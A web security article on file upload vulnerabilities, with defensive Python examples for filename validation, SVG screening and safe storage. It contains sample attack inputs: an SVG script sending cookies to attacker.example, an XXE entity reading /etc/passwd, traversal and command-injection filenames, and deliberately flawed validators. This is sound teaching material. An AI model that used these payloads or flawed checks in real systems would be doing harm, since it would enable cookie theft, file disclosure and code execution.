File Upload Vulnerabilities
Author: Idego Group

Uploading files is a common web application feature, but many developers treat the job as done once the file reaches the server. That assumption leaves gaps that attackers exploit. An upload is only complete when two conditions hold: it succeeds AND it happens securely, meaning the server has validated what it received, stored it under a name it chose itself, and never trusts the filename, headers or content supplied by the client.
Extension-Based Bypasses
Developers commonly validate file types by checking the extension against a whitelist or a blacklist, but both approaches are easy to get wrong. A case-sensitive pattern lets shell.pHp past a blacklist that only matches .php. A whitelist pattern that is not anchored to the end of the name accepts shell.jpg.php, and a blacklist that only inspects the final extension accepts shell.php.jpg, which some server configurations (Apache with a PHP handler bound by AddHandler, for example) still execute because every extension in the name is examined. Filename truncation at a length limit can cut a long name such as shell.php followed by padding and .jpg so that the stored file ends in .php rather than the .jpg that was checked.
Null-Byte Injection
Naming the file shell.php%00.jpg exploits runtimes whose underlying C file functions treat a null byte as the end of the string: the validation layer sees a name ending in .jpg, while the filesystem call writes shell.php. PHP versions before 5.3.4 were affected; modern runtimes reject null bytes in paths, but the upload check should still decode the name and refuse any control characters rather than rely on the runtime.
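The three bypasses above side by side with a check that resists them, as an added example that is not part of the original article. The two naive functions deliberately reproduce the flaws described (a case-sensitive blacklist on the final extension, an unanchored whitelist); the hardened check percent-decodes the name, rejects control characters, caps the length, and applies one anchored, case-insensitive allowlist over the whole name. The probe names and the allowlist are constructed for the example.

```python
import re
import urllib.parse

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
MAX_NAME_LEN = 100  # well under typical 255-byte filesystem limits


def naive_blacklist(name: str) -> bool:
    """Flawed: case-sensitive and only looks at the final extension."""
    return re.search(r"\.(php|phtml)$", name) is None


def naive_whitelist(name: str) -> bool:
    """Flawed: the pattern is not anchored to the end of the name."""
    return re.search(r"\.(jpg|jpeg|png|gif)", name) is not None


def hardened_check(raw_name: str) -> bool:
    """One anchored, case-insensitive allowlist over the whole name.

    True only for <base>.<ext> where ext is allowlisted, the base has no
    dots or special characters, and no control bytes are present.
    """
    # Decode percent-encoding first so shell.php%00.jpg is seen as a real
    # null byte rather than the harmless literal string "%00".
    name = urllib.parse.unquote(raw_name)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return False  # null byte or other control character
    if len(name) > MAX_NAME_LEN:
        return False  # a later truncation could change the effective extension
    m = re.fullmatch(r"[a-z0-9_-]+\.([a-z0-9]+)", name.lower())
    return m is not None and m.group(1) in ALLOWED_EXTENSIONS


# Constructed probe names, one per bypass from the text.
PROBES = [
    "photo.jpg",
    "shell.pHp",                          # case bypass of the blacklist
    "shell.php.jpg",                      # double extension, final one looks safe
    "shell.jpg.php",                      # unanchored whitelist matches ".jpg" mid-name
    "shell.php%00.jpg",                   # null byte, decoded before the hardened check
    "shell.php" + "A" * 200 + ".jpg",     # candidate for truncation
]


def evaluate(name: str) -> dict:
    return {
        "blacklist": naive_blacklist(name),
        "whitelist": naive_whitelist(name),
        "hardened": hardened_check(name),
    }


if __name__ == "__main__":
    for probe in PROBES:
        print(f"{probe[:40]:<40} {evaluate(probe)}")
```

The hardened check is deliberately strict about the base name; that is acceptable because, as the later sections argue, the client's name should never be used on disk anyway, so only the extension it yields matters.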
SVG and XML Threats
SVG files are XML documents and can carry JavaScript in script elements, in event-handler attributes such as onload, and in javascript: links. The script runs when a browser renders the SVG as a document, which happens when a user opens the uploaded file's URL directly or when the site inlines the markup into a page; it does not run when the SVG is shown through an img tag or merely downloaded. Served from the site's own origin, such a file is a stored cross-site scripting vulnerability. Uploaded SVGs therefore need to be sanitized or rejected, served from a separate origin with Content-Disposition: attachment, and parsed with an XML parser that has external entities disabled, since the same document can also carry XXE payloads.
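A stdlib-only SVG screen, as an added example that is not part of the original article. It refuses any document with a DTD (the precondition for XXE and entity-expansion bombs), then walks the parsed tree with xml.etree and reports script-capable elements, on* event attributes, and href values whose scheme is not http or https (an allowlist, so obfuscated javascript: variants are caught as well). The three sample documents are constructed for the example; a production deployment would use a maintained sanitizer and serve the file from a separate origin regardless of the result.

```python
import xml.etree.ElementTree as ET

# Elements that can run script or embed foreign content inside an SVG.
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}


def _local(name: str) -> str:
    """ElementTree writes namespaced names as '{uri}local'; keep 'local'."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list:
    """Return the reasons an SVG is unsafe; an empty list means none found."""
    lowered = data.lower()
    # Refuse DTDs outright: external entities (XXE) and entity-expansion
    # bombs both need one, and an ordinary SVG does not.
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return ["DOCTYPE/ENTITY declaration present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            a = _local(attr)            # covers xlink:href as well as href
            v = value.strip().lower()
            if a.startswith("on"):
                findings.append(f"event handler {a} on <{tag}>")
            elif a == "href":
                # Allowlist the scheme; anything else (javascript:, data:,
                # "java\nscript:" and friends) is reported.
                head = v.split(":", 1)[0] if ":" in v else ""
                if head and "/" not in head and head not in ("http", "https"):
                    findings.append(f"href with {head!r} scheme on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


# Constructed samples.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<rect width="10" height="10" fill="red"/></svg>')

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">click me</text></a>
</svg>"""

XXE_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>"""


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG), ("xxe", XXE_SVG)):
        print(label, svg_findings(doc))
```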
Directory Traversal
If the client-supplied filename is used when writing to disk, a name like ../../../etc/passwd escapes the upload directory and can overwrite critical files elsewhere on the server. The fix is never to use the client's name for the stored file: generate a random filename, store the original name separately as metadata, and resolve the final path to confirm it stays inside the upload directory.
Denial of Service
Many concurrent uploads of large files exhaust memory, bandwidth or disk space. A maximum file size is essential, enforced while the data arrives (stream it and abort as soon as the limit is exceeded) rather than after the whole file has been buffered; per-user quotas and rate limits complete the picture.
Content-Type Spoofing
The Content-Type header in the multipart request is set by the client and is trivially changed with an intercepting proxy, so it proves nothing about the file. Validation must rely on the actual file content; the header is at most a hint.
Magic Number Evasion
Attackers prepend a valid signature such as GIF89a to a PHP payload so that a check of the first bytes passes. A signature check is necessary but not sufficient: parse the file's full structure with a real decoder (or re-encode the image through an image library), and remember that even a fully valid image can carry a payload in a comment block, so uploads must never be served from a location where the web server will execute them.
Command Injection
When a filename is passed to a system binary through a shell, a name such as file;whoami;pwd.jpg runs the embedded commands. Using a random, server-generated name removes shell metacharacters from the path entirely; passing arguments to the binary as an argument list rather than a shell string closes the gap even where the original name must be used.
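The storage side of the recommendations in the Directory Traversal, Denial of Service and Command Injection sections, as one added example that is not part of the original article. It streams the upload to a random name chosen by the server (the client's name goes only into a JSON sidecar), aborts and removes the partial file once the size cap is exceeded, refuses to overwrite, confirms the resolved path stays inside the upload root, and calls an external tool with an argv list instead of a shell string. The size cap, file layout, demo() scenario and sidecar format are assumptions for the example.

```python
import io
import json
import re
import secrets
import subprocess
import tempfile
from pathlib import Path

MAX_UPLOAD_BYTES = 5 * 1024 * 1024
CHUNK = 64 * 1024
STORABLE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
STORED_NAME_RE = re.compile(r"^[0-9a-f]{32}\.[a-z]+$")


class UploadRejected(Exception):
    pass


def store_upload(stream, original_name: str, extension: str, upload_root: Path) -> dict:
    """Stream an upload to disk under a random name and enforce a size cap.

    The client's filename never touches the filesystem; it is recorded in a
    JSON sidecar as metadata only. `extension` must already have passed an
    allowlist check.
    """
    if extension not in STORABLE_EXTENSIONS:
        raise UploadRejected(f"extension {extension!r} not allowed")
    upload_root = upload_root.resolve()
    stored_name = f"{secrets.token_hex(16)}.{extension}"
    dest = (upload_root / stored_name).resolve()
    if dest.parent != upload_root:            # cannot fail with a hex token, but check anyway
        raise UploadRejected("path escapes upload directory")

    written = 0
    try:
        with open(dest, "xb") as out:         # "x": fail rather than overwrite
            while chunk := stream.read(CHUNK):
                written += len(chunk)
                if written > MAX_UPLOAD_BYTES:
                    raise UploadRejected("exceeds size limit")
                out.write(chunk)
    except UploadRejected:
        dest.unlink(missing_ok=True)          # leave no partial file behind
        raise

    meta = {"original_name": original_name, "stored_name": stored_name, "size": written}
    (upload_root / (stored_name + ".json")).write_text(json.dumps(meta))
    return meta


def identify_with_file_cmd(path: Path) -> str:
    """Run an external tool with an argv list: no shell is involved, so no
    metacharacter in any name can become a command. (Not called by demo().)"""
    result = subprocess.run(["file", "--brief", "--mime-type", str(path)],
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def demo() -> dict:
    """Constructed scenario: a traversal-style name and an oversized upload."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        meta = store_upload(io.BytesIO(b"\xff\xd8" + b"\x00" * 98),
                            "../../../etc/passwd", "jpg", root)
        try:
            store_upload(io.BytesIO(b"A" * (MAX_UPLOAD_BYTES + 1)), "big.jpg", "jpg", root)
            oversized_rejected = False
        except UploadRejected:
            oversized_rejected = True
        files_left = sorted(p.name for p in root.iterdir())
        return {
            "stored_name_is_random": bool(STORED_NAME_RE.match(meta["stored_name"])),
            "original_name_kept_as_metadata": meta["original_name"],
            "written": meta["size"],
            "oversized_rejected": oversized_rejected,
            "files_left": files_left,      # expected: the stored image and its sidecar only
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```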
Security Recommendations
Treat nothing from the client as trusted: not the filename, the extension, the Content-Type header, the first bytes or the claimed size. Use maintained, purpose-built validation and image libraries, keep them and their dependencies updated, and combine several independent checks (extension allowlist, content parsing, size limits, random storage names, non-executable storage) rather than relying on any single one.